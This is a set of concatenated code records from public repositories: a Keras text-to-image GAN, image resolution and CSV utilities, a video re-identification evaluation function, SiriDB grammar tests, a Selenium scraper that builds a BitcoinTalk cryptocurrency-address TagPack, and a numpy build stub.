5,padding='same')(layer6)\n output = Activation('tanh')(layer6)\n\n self.generator = Model([randomInput,textInput],output)\n self.generator.compile(loss='mean_squared_error',optimizer='SGD')\n\n print('generator ', self.generator.summary())\n\n def createDiscrimminator(self,textInput,imgInput):\n textOutput = Dense(1024)(textInput)\n\n layer1 = Conv2D(64,kernel_size = 5,padding = 'same')(imgInput)\n layer1 = Activation('tanh')(layer1)\n\n layer2 = MaxPooling2D(pool_size = (2,2))(layer1)\n\n layer3 = Conv2D(128,kernel_size = 5)(layer2)\n layer3 = Activation('tanh')(layer3)\n\n layer4 = MaxPooling2D(pool_size = (2,2))(layer3)\n\n layer5 = Flatten()(layer4)\n imgOutput = Dense(1024)(layer5)\n\n totalInput = concatenate([imgOutput,textOutput])\n\n layer6 = Activation('tanh')(totalInput)\n layer6 = Dense(1)(layer6)\n\n output = Activation('sigmoid')(layer6)\n\n self.discriminator = Model([imgInput,textInput],output)\n d_optim = SGD(lr=0.0005, momentum=0.5, nesterov=True)\n self.discriminator.compile(loss='binary_crossentropy', optimizer=d_optim)\n\n print('discriminator: ', self.discriminator.summary())\n\n def createModel(self):\n generatorTextInput = Input(shape = (self.textInputDim,))\n generatorRandomInput = Input(shape = (self.randomInputDim,))\n\n discriminatorTextInput = Input(shape = (self.textInputDim,))\n discriminatorImageInput = Input(shape = (self.imgWidth, self.imgHeight,self.imgChannels))\n\n self.createGenerator(generatorRandomInput,generatorTextInput)\n self.createDiscrimminator(discriminatorTextInput,discriminatorImageInput)\n \n output = self.discriminator([self.generator.output,generatorTextInput])\n\n self.model = Model([generatorRandomInput, generatorTextInput], output)\n self.discriminator.trainable = False\n\n g_optim = SGD(lr=0.0005, momentum=0.5, nesterov=True)\n self.model.compile(loss='binary_crossentropy', optimizer=g_optim)\n\n print('generator-discriminator: ', self.model.summary())\n\n def buildModel(self):\n self.createModel()\n\n def loadModel(self, modelDirPath):\n configFilePath = 
DCGan.getConfigFilePath(modelDirPath)\n self.config = np.load(configFilePath).item()\n self.imgWidth = self.config['imgWidth']\n self.imgHeight = self.config['imgHeight']\n self.imgChannels = self.config['imgChannels']\n self.randomInputDim = self.config['randomInputDim']\n self.textInputDim = self.config['textInputDim']\n\n self.buildModel()\n self.word2vecModel = GLOVEModel(self.textInputDim)\n self.generator.load_weights(DCGan.getWeightFilePath(modelDirPath,'generator'))\n self.discriminator.load_weights(DCGan.getWeightFilePath(modelDirPath, 'discriminator'))\n self.word2vecModel.build()\n\n def fit(self,modelDirPath,data,epochs = None, batchSize = None,snapshotDirPath = None, snapshotInterval = None):\n \n if (epochs == None):\n epochs = 100\n\n if (batchSize == None):\n batchSize = 128\n\n if (snapshotInterval == None):\n snapshotInterval = 20\n\n self.config = dict()\n self.config['imgWidth'] = self.imgWidth\n self.config['imgHeight'] = self.imgHeight\n self.config['randomInputDim'] = self.randomInputDim\n self.config['textInputDim'] = self.textInputDim\n self.config['imgChannels'] = self.imgChannels\n \n self.word2vecModel = GLOVEModel(self.textInputDim)\n self.word2vecModel.build()\n\n configFilePath = DCGan.getConfigFilePath(modelDirPath)\n\n np.save(configFilePath,self.config)\n \n randomBatch = np.zeros((batchSize,self.randomInputDim))\n textBatch = np.zeros((batchSize, self.textInputDim))\n\n self.buildModel()\n\n for epoch in range(epochs):\n batchCount = int(data.shape[0] / batchSize)\n\n for batchIndex in range(batchCount):\n dataBatch = data[batchIndex * batchSize:(batchIndex + 1) * batchSize]\n\n imageBatch = []\n for index in range(batchSize):\n dataUnit = dataBatch[index]\n\n img = dataUnit[0]\n text = dataUnit[1]\n\n imageBatch.append(img)\n\n textBatch[index, :] = self.word2vecModel.encode(text)\n randomBatch[index, :] = np.random.uniform(-1, 1, self.randomInputDim)\n\n imageBatch = np.array(imageBatch)\n\n generatedImages = self.generator.predict([randomBatch, textBatch], verbose=0)\n\n if (epoch * batchSize + batchIndex) % snapshotInterval == 0:\n self.saveSnapshots(generatedImages,snapshotDirPath,epoch,batchIndex)\n\n self.discriminator.trainable = True\n d_loss = self.discriminator.train_on_batch([np.concatenate((imageBatch, generatedImages)),\n np.concatenate((textBatch, textBatch))],\n np.array([1] * batchSize + [0] * batchSize))\n\n print(\"Epoch %d batch %d d_loss : %f\" % (epoch, batchIndex, d_loss))\n\n for index in range(batchSize):\n randomBatch[index, :] = np.random.uniform(-1, 1, self.randomInputDim)\n\n self.discriminator.trainable = False\n g_loss = self.model.train_on_batch([randomBatch, textBatch], np.array([1] * batchSize))\n\n print(\"Epoch %d batch %d g_loss : %f\" % (epoch, batchIndex, g_loss))\n\n self.generator.save_weights(DCGan.getWeightFilePath(modelDirPath, 'generator'), True)\n self.discriminator.save_weights(DCGan.getWeightFilePath(modelDirPath, 'discriminator'), True)\n\n def generateImage(self, text):\n randomInput = np.zeros(shape=(1, self.randomInputDim))\n textInput = np.zeros(shape=(1, self.textInputDim))\n\n randomInput[0, :] = np.random.uniform(-1, 1, self.randomInputDim)\n textInput[0, :] = self.word2vecModel.encode(text)\n\n image = self.generator.predict([randomInput, textInput], verbose=0)\n\n image = image[0]\n image = image * 127.5 + 127.5\n\n return Image.fromarray(image.astype(np.uint8))\n\n def saveSnapshots(self, generated_images, snapshot_dir_path, epoch, batch_index):\n image = 
imageProcess.imageMerge(generated_images)\n\n imageProcess.UndoNormalizedImg(image).save(\n os.path.join(snapshot_dir_path, DCGan.modelName + '-' + str(epoch) + \"-\" + str(batch_index) + \".png\"))","repo_name":"happyMH/MK","sub_path":"ganModel1.py","file_name":"ganModel1.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"16272638103","text":"import numpy as np\r\nfrom PIL import Image\r\n\r\n\r\ndef spatial_resolution():\r\n img = Image.open(\"img/lena.tif\")\r\n out = img.resize((int(img.size[0] / 2), int(img.size[1] / 2)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n out = img.resize((int(img.size[0] / 4), int(img.size[1] / 4)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n out = img.resize((int(img.size[0] / 8), int(img.size[1] / 8)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n\r\n\r\ndef gray_resolution():\r\n img = Image.open(\"img/lena.tif\")\r\n img_array = np.array(img)\r\n out_array = img_array >> 2\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-127.tif\")\r\n out_array = img_array >> 3\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-63.tif\")\r\n out_array = img_array >> 4\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-31.tif\")\r\n\r\n\r\nif __name__ == '__main__':\r\n spatial_resolution()\r\n gray_resolution()\r\n","repo_name":"Mecheal-helloworld/Image-Analysis","sub_path":"ResolutionRatio.py","file_name":"ResolutionRatio.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20239293100","text":"# @Author: Joey Teng \n# @Date: 19-Nov-2017\n# @Email: joey.teng.dev@gmail.com\n# @Filename: json2csv.py\n# @Last modified by: Toujour\n# @Last modified time: 19-Nov-2017\n\n\nimport json\nimport sys\n\nimport numpy\n\n\ndef CSV(matrix, filename):\n file = open(filename, 'w')\n for i in matrix:\n for j in i:\n file.write('{0},'.format(j))\n file.write('\\n')\n\n\ndef loadCSV2(filename):\n return numpy.array(list(map(lambda x: tuple(map(float, x.split(','))), open(filename, 'r').read().split('\\n')))).transpose().tolist()\n\n\nif __name__ == '__main__':\n CSV(loadCSV2(sys.argv[1]), sys.argv[2])\n","repo_name":"JoeyTeng/HiMCM-2017","sub_path":"json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11812787487","text":"from __future__ import print_function, absolute_import\nimport os\nimport gc\nimport sys\nimport time\nimport math\nimport h5py\nimport scipy\nimport datetime\nimport argparse\nimport os.path as osp\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\n\nimport data_manager\nfrom video_loader import VideoDataset\nimport transforms.spatial_transforms as ST\nimport transforms.temporal_transforms as TT\nimport models\n\nfrom utils import AverageMeter, Logger, save_checkpoint\nfrom eval_metrics import evaluate\n\n\ndef extract(model, args, vids, use_gpu):\n n, c, t, h, w = vids.size()\n assert(n == 1)\n k = args.test_frames\n\n if t % k != 0:\n inputs = vids.clone()\n while(inputs.size(2) % k != 0):\n for 
idx in range(t):\n if (inputs.size(2) % k == 0):\n break\n inputs = torch.cat((inputs, vids[:,:,idx:idx+1]), 2)\n vids = inputs\n t = vids.size(2)\n assert (t % k == 0)\n\n vids = vids.view(c, t//k, k, h, w).contiguous()\n vids = vids.transpose(0, 1) #[t//k, c, k, h, w]\n vids = vids.cuda()\n\n num_clips = vids.size(0)\n batch_size = 32\n feat = torch.cuda.FloatTensor()\n for i in range(int(math.ceil(num_clips * 1.0 / batch_size))):\n clip = vids[i*batch_size: (i+1)*batch_size] #[batch_size, c, k, h, w]\n output = model(clip) #[batch_size, k/1, c]\n output = output.view(-1, output.size(-1)) #[batch_size*k, c]\n feat = torch.cat((feat, output), 0)\n\n feat = feat.mean(0, keepdim=True)\n feat = model.module.bn(feat)\n\n return feat\n\ndef evaluation(model, args, queryloader, galleryloader, use_gpu, ranks=[1, 5, 10, 20]):\n since = time.time()\n model.eval()\n\n qf, q_pids, q_camids = [], [], []\n for batch_idx, (vids, pids, camids) in enumerate(queryloader):\n if (batch_idx + 1) % 1000==0:\n print(\"{}/{}\".format(batch_idx+1, len(queryloader)))\n\n qf.append(extract(model, args, vids, use_gpu).squeeze())\n q_pids.extend(pids)\n q_camids.extend(camids)\n\n qf = torch.stack(qf)\n q_pids = np.asarray(q_pids)\n q_camids = np.asarray(q_camids)\n print(\"Extracted features for query set, obtained {} matrix\".format(qf.shape))\n\n gf, g_pids, g_camids = [], [], []\n for batch_idx, (vids, pids, camids) in enumerate(galleryloader):\n if (batch_idx + 1) % 1000==0:\n print(\"{}/{}\".format(batch_idx+1, len(galleryloader)))\n\n gf.append(extract(model, args, vids, use_gpu).squeeze())\n g_pids.extend(pids)\n g_camids.extend(camids)\n\n gf = torch.stack(gf)\n g_pids = np.asarray(g_pids)\n g_camids = np.asarray(g_camids)\n\n if args.dataset == 'mars' or args.dataset == 'lsvid':\n print('process the dataset {}!'.format(args.dataset))\n # gallery set must contain query set, otherwise 140 query imgs will not have ground truth.\n gf = torch.cat((qf, gf), 0)\n g_pids = np.append(q_pids, g_pids)\n g_camids = np.append(q_camids, g_camids)\n\n print(\"Extracted features for gallery set, obtained {} matrix\".format(gf.shape))\n\n time_elapsed = time.time() - since\n print('Extracting features complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n\n print(\"Computing distance matrix\")\n m, n = qf.size(0), gf.size(0)\n distmat = torch.zeros((m,n))\n\n if args.distance == 'euclidean':\n distmat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n distmat.addmm_(1, -2, qf, gf.t())\n else:\n q_norm = torch.norm(qf, p=2, dim=1, keepdim=True)\n g_norm = torch.norm(gf, p=2, dim=1, keepdim=True)\n qf = qf.div(q_norm.expand_as(qf))\n gf = gf.div(g_norm.expand_as(gf))\n distmat = - torch.mm(qf, gf.t())\n distmat = distmat.data.cpu()\n distmat = distmat.numpy()\n\n print(\"Computing CMC and mAP\")\n cmc, mAP = evaluate(distmat, q_pids, g_pids, q_camids, g_camids)\n\n print(\"Results ----------\")\n print(\"mAP: {:.2%}\".format(mAP))\n print(\"CMC curve\")\n for r in ranks:\n print(\"Rank-{:<3}: {:.2%}\".format(r, cmc[r-1]))\n print(\"------------------\")\n\n elapsed = round(time.time() - since)\n elapsed = str(datetime.timedelta(seconds=elapsed))\n print(\"Finished. 
Total elapsed time (h:m:s): {}.\".format(elapsed))\n\n return cmc[0]\n","repo_name":"blue-blue272/BiCnet-TKS","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"82"} +{"seq_id":"39109928240","text":"import re\nimport random\nimport asyncio\nimport functools\nimport random\nimport time\nimport os\nimport sys\nfrom math import nan\nfrom testing import default_test_setup\nfrom testing import parse_args\nfrom testing import run_test\nfrom testing import Server\nfrom testing import SiriDB\nfrom testing import TestBase\nfrom testing.constants import PYGRAMMAR_PATH\nfrom querygenerator.querygenerator import QueryGenerator\nfrom querygenerator.k_map import k_map\nsys.path.append(PYGRAMMAR_PATH)\nfrom grammar import SiriGrammar # nopep8\n\n\ndef gen_simple_data(m, n):\n series = {\n str(a).zfill(6): [[b*n+a, random.randint(0, 20)] for b in range(n)]\n for a in range(m)}\n return series\n\n\ndef update_k_map_show(show):\n kv = {a['name']: a['value'] for a in show['data']}\n k_map['r_integer']['k_active_handles'] = kv['active_handles']\n k_map['r_doubleq_str']['k_buffer_path'] = '\"'+kv['buffer_path']+'\"'\n k_map['r_integer']['k_buffer_size'] = kv['buffer_size']\n k_map['r_doubleq_str']['k_dbpath'] = '\"'+kv['dbpath']+'\"'\n k_map['r_float']['k_drop_threshold'] = kv['drop_threshold']\n k_map['r_doubleq_str']['k_ip_support'] = '\"'+kv['ip_support']+'\"'\n k_map['r_doubleq_str']['k_libuv'] = '\"'+kv['libuv']+'\"'\n k_map['r_integer']['k_max_open_files'] = kv['max_open_files']\n k_map['r_integer']['k_mem_usage'] = kv['mem_usage']\n k_map['r_integer']['k_open_files'] = kv['open_files']\n k_map['r_integer']['k_pool'] = kv['pool']\n k_map['r_integer']['k_received_points'] = kv['received_points']\n k_map['r_uinteger']['k_list_limit'] = kv['list_limit']\n k_map['r_integer']['k_startup_time'] = kv['startup_time']\n k_map['r_doubleq_str']['k_status'] = '\"'+kv['status']+'\"'\n k_map['r_doubleq_str']['k_sync_progress'] = '\"'+kv['sync_progress']+'\"'\n k_map['r_doubleq_str']['k_timezone'] = '\"'+kv['timezone']+'\"'\n k_map['r_integer']['k_uptime'] = kv['uptime']\n k_map['r_uuid_str']['r_uuid_str'] = kv['uuid']\n k_map['r_doubleq_str']['k_server'] = '\"'+kv['server']+'\"'\n k_map['r_doubleq_str']['uuid'] = '\"'+kv['server']+'\"'\n k_map['r_doubleq_str']['k_version'] = '\"'+kv['version']+'\"'\n k_map['r_uinteger']['k_port'] = kv['server'].split(':', 1)[1]\n k_map['r_uinteger']['k_select_points_limit'] = \\\n kv['select_points_limit']\n k_map['r_doubleq_str']['k_reindex_progress'] = \\\n '\"'+kv['reindex_progress']+'\"'\n\n\nclass TestGrammar(TestBase):\n title = 'Test from grammar'\n\n async def test_create_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('create_stmt'):\n await self.client0.query(q)\n\n async def test_select_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'k_filter': '', # skip because only number type series\n 'k_prefix': '', # skip\n 'k_suffix': '', # skip\n 'k_merge': '', # skip\n 'k_where': '', # skip\n 'after_expr': '', # skip\n 'before_expr': '', # skip\n 'between_expr': '', # skip\n }\n })\n for q in qb.generate_queries('select_stmt'):\n await self.client0.query(q)\n\n async def test_revoke_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 
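# an empty replacement drops single-quoted string tokens from the generated revoke statements\n                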
'r_singleq_str': ''\n }})\n for q in qb.generate_queries('revoke_stmt'):\n await self.client0.query(q)\n\n async def test_grant_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('grant_stmt'):\n await self.client0.query(q)\n\n async def test_alter_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'k_now': '', # not possible (set expiration num/log)\n 'set_name': '', # skip\n 'set_address': '', # not possible\n 'set_port': '', # not possible\n 'set_timezone': '', # same value error\n 'set_log_level': '', # not required, but skip to keep loglevel\n }})\n for q in qb.generate_queries('alter_stmt'):\n await self.client0.query(q)\n\n async def test_count_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('count_stmt'):\n await self.client0.query(q)\n\n async def test_list_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('list_stmt'):\n await self.client0.query(q)\n\n async def test_drop_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'drop_server': '', # not possible\n }})\n for q in qb.generate_queries('drop_stmt'):\n await self.client0.query(q)\n\n async def test_show_stmt(self):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': ''\n }})\n for q in qb.generate_queries('show_stmt'):\n await self.client0.query(q)\n\n @default_test_setup(1)\n async def run(self):\n await self.client0.connect()\n\n # await self.db.add_pool(self.server1, sleep=2)\n\n update_k_map_show(await self.client0.query('show'))\n\n series = gen_simple_data(20, 70)\n\n await self.client0.insert(series)\n await self.client0.query('create group `GROUP_OR_TAG` for /00000.*/')\n\n await self.test_create_stmt()\n\n time.sleep(2)\n\n await self.test_count_stmt()\n\n await self.test_list_stmt()\n\n await self.test_select_stmt()\n\n await self.test_revoke_stmt()\n\n await self.test_grant_stmt()\n\n await self.test_alter_stmt()\n\n await self.test_drop_stmt()\n\n await self.test_show_stmt()\n\n self.client0.close()\n\n return False\n\n\nclass TestGrammarStart(TestBase):\n\n async def test_all_stmts(self, client):\n qb = QueryGenerator(SiriGrammar, {\n 'regex_map': k_map,\n 'replace_map': {\n 'r_singleq_str': '',\n 'r_comment': '',\n 'k_timeit': '',\n 'select_stmt': '',\n 'list_stmt': '',\n 'count_stmt': '',\n\n 'alter_group': '',\n # 'drop_group': '',\n 'alter_server': '',\n 'drop_server': '',\n 'alter_user': '',\n 'drop_user': '',\n\n # 'set_address': '',\n # 'set_port': '',\n 'set_timezone': '',\n 'set_log_level': '', # not required, skip to keep log level\n 'set_expiration_num': '',\n 'set_expiration_log': '',\n\n 'k_prefix': '',\n 'k_suffix': '',\n 'k_filter': '',\n # 'k_where': '',\n 'after_expr': '',\n 'before_expr': '',\n 'between_expr': '',\n 'k_merge': '',\n }\n })\n for q in qb.generate_queries():\n await self.client0.query(q)\n\n @default_test_setup(1)\n async def run(self):\n await self.client0.connect()\n\n # await self.db.add_pool(self.server1, sleep=2)\n\n update_k_map_show(await self.client0.query('show'))\n\n series = gen_simple_data(20, 70)\n\n await self.client0.insert(series)\n await self.client0.query('create group `GROUP_OR_TAG` for 
/00000.*/')\n # time.sleep(2)\n await self.test_all_stmts()\n self.client0.close()\n return False\n\n\nif __name__ == '__main__':\n parse_args()\n run_test(TestGrammar())\n","repo_name":"SiriDB/siridb-server","sub_path":"itest/test_grammar.py","file_name":"test_grammar.py","file_ext":"py","file_size_in_byte":8370,"program_lang":"python","lang":"en","doc_type":"code","stars":486,"dataset":"github-code","pt":"82"} +{"seq_id":"70686909707","text":"#!/usr/bin/env python3\n\"\"\"\nConvert BitcoinTalk users data to a TagPack.\n\"\"\"\nimport os\nimport re\nimport sys\nimport json\nimport time\nfrom datetime import datetime, date\nfrom typing import List, Union, TextIO\n\nimport yaml\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\n\n# Taken from Sanctioned NBCTF generator and modified\nREGEX = [\n ('BTC', re.compile(r'\\b((bc(0([ac-hj-np-z02-9]{39}|[ac-hj-np-z02-9]{59})|1[ac-hj-np-z02-9]{8,87}))|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\\b')),\n ('BCH', re.compile(r'\\b(((?:bitcoincash|bchtest):)?([13][0-9a-zA-Z]{33}))|\\b(((?:bitcoincash|bchtest):)?(qp)?[0-9a-zA-Z]{40})\\b')),\n ('LTC', re.compile(r'\\b([LM3][a-km-zA-HJ-NP-Z1-9]{25,33})\\b')),\n ('ZEC', re.compile(r'\\b([tz][13][a-km-zA-HJ-NP-Z1-9]{33})\\b')),\n ('ETH', re.compile(r'\\b((0x)?[0-9a-fA-F]{40})\\b'))\n]\n\nBITCOINTALK_PROFILE_URL = 'https://bitcointalk.org/index.php?action=profile;u={user_id}'\n\nclass RawData:\n \"\"\"\n Download and read data provided by the source.\n \"\"\"\n def __init__(self, fn: str, url: str):\n self.fn = fn\n self.url = url\n\n @staticmethod\n def download_profile(wd: webdriver.Remote, user_id: int) -> Union[dict, None]:\n url = BITCOINTALK_PROFILE_URL.format(user_id=user_id)\n for _ in range(5):\n try:\n wd.get(url)\n except TimeoutException:\n print('Retrying URL {url} (retry {retry})'.format(url=url, retry=_+1), file=sys.stderr)\n continue\n else:\n break\n # If no profile found, exit here\n if wd.title == 'An Error Has Occurred!':\n return None\n # So we got a user profile, which we put into a dictionary\n data = {'user_id': user_id}\n for entry in wd.find_elements(By.XPATH, '//table/tbody/tr/td/table/tbody/tr[2]/td[1]/table/tbody/tr'):\n try:\n key = entry.find_element(By.XPATH, 'td[1]/b').text\n except NoSuchElementException:\n continue # No key, hence no information here\n try:\n value = entry.find_element(By.XPATH, 'td[2]').text\n except NoSuchElementException:\n continue # No value, hence no information here\n # Normalise key and value\n key = key.strip().lower().replace(':', '').replace(' ', '_')\n value = value.strip()\n # Skip entry with either empty key or empty value\n if not key or not value:\n continue\n # E-mail address is always hidden, hence we skip it\n if key == 'email':\n continue\n # Age may be hidden; if so, we skip the entry too\n if key == 'age' and value == 'N/A':\n continue\n # Convert values in certain entries to integers\n if key in ('posts', 'activity', 'merit', 'age'):\n value = int(value)\n # Add entry to the profile data\n data[key] = value\n # Also scrape signature\n try:\n signature = wd.find_element(By.XPATH, '//div[@class=\"signature\"]').text\n except NoSuchElementException:\n pass\n else:\n if signature:\n data['signature'] = signature\n # ... 
and avatar URL\n try:\n avatar_url = wd.find_element(By.XPATH, '//img[@class=\"avatar\"]').get_attribute('src')\n except NoSuchElementException:\n pass\n else:\n if avatar_url:\n data['avatar_url'] = avatar_url\n # ... and avatar text\n try:\n avatar_text = ' '.join([el.text for el in wd.find_elements(By.XPATH, '//img[@class=\"avatar\"]/..')]).strip()\n except NoSuchElementException:\n pass\n else:\n if avatar_text:\n data['avatar_text'] = avatar_text\n #print(data)\n return data\n\n def download_profiles(self, out_file: TextIO, wd: webdriver.Remote, starting_user_id: int):\n user_id = last_valid_user_id = starting_user_id\n while True:\n # Exit if we could not fetch too many profiles\n if user_id - last_valid_user_id >= 1000:\n break\n # Fetch profile and, if valid, save it\n profile = self.download_profile(wd, user_id)\n if profile is not None:\n last_valid_user_id = user_id\n print(json.dumps(profile, ensure_ascii=False), file=out_file)\n # We pause for 1 second to confirm to the rules of the forum\n time.sleep(1)\n user_id += 1\n\n @staticmethod\n def get_max_user_id(file: TextIO) -> int:\n user_id = 0\n for line in file:\n profile = json.loads(line)\n user_id = max(profile['user_id'], user_id)\n return user_id\n\n @staticmethod\n def get_missing_user_ids(file: TextIO, max_id: int) -> List[int]:\n user_ids = set()\n for line in file:\n profile = json.loads(line)\n user_ids.add(profile['user_id'])\n return [user_id for user_id in range(1, max_id + 1) if user_id not in user_ids]\n\n def download_missing_profiles(self, out_file: TextIO, wd: webdriver.Remote, missing_ids: List[int]):\n for user_id in missing_ids:\n profile = self.download_profile(wd, user_id)\n if profile is not None:\n print(json.dumps(profile, ensure_ascii=False), file=out_file)\n time.sleep(1)\n\n def download(self, update=False):\n # Create Firefox webdriver, do not load Javascript and image files\n options = Options()\n options.set_preference('javascript.enabled', False)\n options.set_preference('permissions.default.image', 2)\n wd = webdriver.Firefox(options=options)\n # Scrape user profiles\n if update:\n # Calculate next user id\n with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n next_user_id = self.get_max_user_id(jsonlines_file) + 1\n print('Starting with user ID {next_user_id}'.format(next_user_id=next_user_id))\n # Proceed with next user id\n with open(self.fn, 'a', encoding='utf-8') as jsonlines_file:\n self.download_profiles(jsonlines_file, wd, next_user_id)\n else:\n with open(self.fn, 'w', encoding='utf-8') as jsonlines_file:\n self.download_profiles(jsonlines_file, wd, 1)\n # Calculate missing user ids and try to download them again. 
This should add missing profiles.\n        with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n            max_user_id = self.get_max_user_id(jsonlines_file)\n        with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n            missing_user_ids = self.get_missing_user_ids(jsonlines_file, max_user_id)\n        print('Found {len} missing user IDs; trying to re-fetch them...'.format(len=len(missing_user_ids)))\n        with open(self.fn, 'a', encoding='utf-8') as jsonlines_file:\n            self.download_missing_profiles(jsonlines_file, wd, missing_user_ids)\n        # Clean up\n        wd.quit()\n        os.remove('geckodriver.log')\n\n    def read(self) -> List[dict]:\n        with open(self.fn, 'r', encoding='utf-8') as jsonlines_file:\n            return [json.loads(line) for line in jsonlines_file]\n\n\nclass TagPackGenerator:\n    \"\"\"\n    Generate a TagPack from BitcoinTalk users data.\n    \"\"\"\n\n    def __init__(self, rows: List[dict], title: str, creator: str, description: str, lastmod: date, source: str):\n        self.rows = rows\n        self.data = {\n            'title': title,\n            'creator': creator,\n            'description': description,\n            'lastmod': lastmod,\n            'category': 'user',  # like in the OFAC TagPack generator\n            'tags': []\n        }\n        self.source = source\n\n    def generate(self):\n        tags = []\n        for row in self.rows:\n            user_addresses = {}\n            for key, value in row.items():\n                if type(value) != str:\n                    continue\n                for currency, address_pattern in REGEX:\n                    for match in address_pattern.finditer(value):\n                        address = match.group(0)\n                        if address not in user_addresses:\n                            user_addresses[address] = currency\n            #if user_addresses:\n            #    print(row['user_id'], user_addresses)\n            for address, currency in user_addresses.items():\n                tag = {\n                    'address': address,\n                    'currency': currency,\n                    'label': 'User {name} at BitcoinTalk forum'.format(name=row['name']),\n                    'source': BITCOINTALK_PROFILE_URL.format(user_id=row['user_id'])\n                }\n                tags.append(tag)\n        self.data['tags'] = tags\n\n    def saveYaml(self, fn: str):\n        with open(fn, 'w', encoding='utf-8') as f:\n            f.write(yaml.dump(self.data, sort_keys=False))\n\n\nif __name__ == '__main__':\n    with open('config.yaml', 'r') as config_file:\n        config = yaml.safe_load(config_file)\n\n    raw_data = RawData(config['RAW_FILE_NAME'], config['URL'])\n    update_raw_data = len(sys.argv) >= 2 and sys.argv[1] == 'update'\n    if not os.path.exists(config['RAW_FILE_NAME']) or update_raw_data:\n        raw_data.download(update_raw_data)\n\n    last_mod = datetime.fromtimestamp(os.path.getmtime(config['RAW_FILE_NAME'])).date()\n    generator = TagPackGenerator(raw_data.read(), config['TITLE'], config['CREATOR'], config['DESCRIPTION'],\n                                 last_mod, config['SOURCE'])\n    generator.generate()\n    generator.saveYaml(config['TAGPACK_FILE_NAME'])\n","repo_name":"INTERPOL-Innovation-Centre/TagPackConverters","sub_path":"Bitcointalk Users/generateTagPack.py","file_name":"generateTagPack.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"1317281829","text":"import sys\r\n#sys.stdin = open(\"input.txt\",\"rt\") # be sure to comment this out when submitting for grading\r\n\r\nc,n = map(int,(input().split()))\r\n#lst = list(map(int,input().split()))\r\nlst =[]\r\nfor i in range(n):\r\n    lst.append(int(input()))\r\n    \r\n\r\n\r\ndef DFS(L,sum,tsum):\r\n    global max_s\r\n    if sum+(total-tsum) < max_s:\r\n        return\r\n    if sum > c: \r\n        return\r\n    elif L ==n :\r\n        if sum > max_s:\r\n            max_s = sum\r\n        return\r\n    else: \r\n        DFS(L+1,sum+lst[L],tsum+lst[L]) # select the current dog\r\n        DFS(L+1,sum,tsum+lst[L]) # do not select the current dog\r\n\r\ntotal = sum(lst)\r\nmax_s = 
-1\r\nDFS(0,0,0)\r\nprint(max_s)\r\n","repo_name":"100race/algorithm-study","sub_path":"algorithm/강아지승차_DFS.py","file_name":"강아지승차_DFS.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4596795328","text":"#!/usr/bin/env python\n\ndef configuration(parent_package='',top_path=None):\n #from numpy.distutils.system_info import get_info, NotFoundError\n from numpy.distutils.misc_util import Configuration\n\n #lapack_opt = get_info('lapack_opt')\n config = Configuration('amg_core', parent_package, top_path)\n\n config.add_extension('_amg_core', \n define_macros=[('__STDC_FORMAT_MACROS', 1)], \n sources=['amg_core_wrap.cxx'])\n #extra_info = lapack_opt)\n\n return config\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n 